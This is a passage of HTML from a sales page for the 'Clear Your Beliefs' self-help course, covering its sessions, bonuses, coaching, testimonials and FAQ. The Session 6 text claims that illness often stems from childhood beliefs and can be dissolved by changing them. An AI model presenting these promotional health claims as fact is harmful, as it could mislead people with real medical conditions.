distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>” \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. \n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<div style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p>\n\n<div class="parg-text"><p>A: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.</p>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.</p>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" >ClearYourBeliefs.com</a>, BeliefCloset.com, or ConfusedAboutLove.com.</p>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\n// 